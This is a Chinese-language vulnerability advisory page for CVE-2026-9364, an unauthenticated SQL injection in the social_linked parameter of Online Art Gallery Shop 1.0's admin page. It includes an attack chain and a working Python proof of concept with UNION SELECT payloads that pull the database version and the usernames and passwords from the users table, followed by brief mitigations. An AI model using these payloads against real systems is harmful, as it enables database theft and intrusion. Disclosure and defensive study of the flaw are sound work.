IPBUF安全漏洞报告
English
CVE-2026-9364 CVSS 7.3 高危

CVE-2026-9364 projectworlds Online Art Gallery Shop 1.0 SQL注入漏洞

披露日期: 2026-05-24

漏洞信息

漏洞编号
CVE-2026-9364
漏洞类型
SQL注入
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
projectworlds Online Art Gallery Shop 1.0

相关标签

SQL注入projectworldsOnline Art Gallery Shop远程代码执行高危漏洞管理后台无认证利用

漏洞概述

CVE-2026-9364是projectworlds在线艺术画廊购物系统1.0版本中的一个高危SQL注入漏洞。该漏洞存在于管理后台的adminHome.php文件中,具体问题参数为social_linked。攻击者可通过构造恶意SQL payloads,无需任何认证即可远程利用此漏洞。漏洞的CVSS评分为7.3,属于高危级别,对系统的机密性、完整性和可用性均造成一定影响。攻击者成功利用此漏洞可实现未授权数据库访问、敏感数据窃取(如用户信息、订单数据、管理员凭证等),甚至在某些配置下可能实现远程代码执行。该漏洞已于2026年5月24日披露,且相关利用代码已公开发布,意味着潜在攻击者可以轻易获取并使用该漏洞进行攻击。由于该系统面向互联网部署,攻击者可从网络远程发起攻击,无需任何前置条件(如用户交互或身份认证),大大增加了漏洞的利用风险。

技术细节

该SQL注入漏洞存在于/admin/adminHome.php文件中的social_linked参数。由于应用程序在处理用户输入时未对输入数据进行充分的过滤和参数化查询,攻击者可以通过在social_linked参数中注入恶意SQL语句来操纵数据库查询。漏洞属于经典的SQL注入类型,攻击者无需任何认证即可访问存在漏洞的管理接口。攻击者通过发送精心构造的HTTP请求,在social_linked参数中注入SQL代码,如使用UNION SELECT、布尔盲注或时间盲注等技术,可以逐步提取数据库中的敏感信息。常见的利用方式包括:1)通过UNION注入获取数据库版本、当前数据库名、用户信息等;2)使用布尔盲注通过页面响应差异推断数据内容;3)利用时间盲注在无法直接看到输出时通过响应延迟判断条件真假。由于该参数可能用于存储社交媒体链接,攻击者可以利用此功能点执行任意SQL命令。成功利用后,攻击者可以访问整个数据库,可能获取管理员账号密码、用户个人信息、交易记录等敏感数据。

攻击链分析

STEP 1
步骤1: 信息收集
攻击者识别目标系统为projectworlds Online Art Gallery Shop 1.0,确定存在漏洞的管理后台路径/admin/adminHome.php
STEP 2
步骤2: 漏洞探测
攻击者访问/admin/adminHome.php,对social_linked参数发送测试载荷,验证SQL注入漏洞是否存在
STEP 3
步骤3: 构造恶意载荷
攻击者根据目标数据库类型构造SQL注入payload,可使用UNION注入、布尔盲注或时间盲注技术
STEP 4
步骤4: 数据库枚举
通过注入载荷提取数据库版本、当前数据库名、表结构等关键信息
STEP 5
步骤5: 敏感数据提取
利用SQL注入漏洞提取用户表中的用户名、密码哈希等敏感信息
STEP 6
步骤6: 权限提升与持久化
使用获取的凭证登录管理后台,可能进一步获取服务器权限或植入后门

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import sys # CVE-2026-9364 SQL Injection PoC # Target: projectworlds Online Art Gallery Shop 1.0 # Endpoint: /admin/adminHome.php # Parameter: social_linked def exploit_sqli(target_url, payload): """ Exploit SQL injection vulnerability in social_linked parameter """ # Target endpoint url = f"{target_url}/admin/adminHome.php" # Payload for SQL injection data = { 'social_linked': payload } try: response = requests.post(url, data=data, timeout=10) return response.text except requests.exceptions.RequestException as e: return f"Error: {str(e)}" def get_database_version(target_url): """ Extract database version using UNION-based injection """ # SQL injection payload to get database version payload = "' UNION SELECT NULL,version(),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL---" return exploit_sqli(target_url, payload) def get_current_database(target_url): """ Extract current database name """ payload = "' UNION SELECT NULL,database(),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL---" return exploit_sqli(target_url, payload) def get_users_table(target_url): """ Attempt to extract users table data """ payload = "' UNION SELECT NULL,username,password,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users---" return exploit_sqli(target_url, payload) if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2026-9364.py <target_url>") print("Example: python cve-2026-9364.py http://target.com") sys.exit(1) target = sys.argv[1] print(f"[*] CVE-2026-9364 SQL Injection PoC") print(f"[*] Target: {target}") print(f"[*] Exploiting database version...") print(get_database_version(target))

影响范围

projectworlds Online Art Gallery Shop 1.0

防御指南

临时缓解措施
立即限制对/admin/adminHome.php的访问,使用WAF规则过滤包含SQL关键字的请求,暂时禁用social_linked参数功能,等待官方安全更新发布后再恢复使用。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表